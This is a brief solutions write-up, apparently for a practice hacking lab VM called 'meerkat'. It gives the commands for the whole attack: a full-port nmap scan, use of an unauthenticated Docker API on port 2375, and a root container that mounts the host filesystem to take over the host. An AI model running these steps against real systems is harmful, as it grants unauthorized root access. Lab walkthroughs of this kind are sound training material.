# Solutions
There may be other valid ways of doing this but these are the methods that worked for me.

Scan the vm with the below command:  
`nmap -p- meerkat.hacking.treilly.co.uk`

Docker commands can be run against the VM like below:  
`docker -H tcp://meerkat.hacking.treilly.co.uk:2375 info`

This will allow you to run a interactive container with the root user and mount the hosts file system:  
`docker -H tcp://meerkat.hacking.treilly.co.uk:2375 run -it -v /:/data ubuntu bash`
